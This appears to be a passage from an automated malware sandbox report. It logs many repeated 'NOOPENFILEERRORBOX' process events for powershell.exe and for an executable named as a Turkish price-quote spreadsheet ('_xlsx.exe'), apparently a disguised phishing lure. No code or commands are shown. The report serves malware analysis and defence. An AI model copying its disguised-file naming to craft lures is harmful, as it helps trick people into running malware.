Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
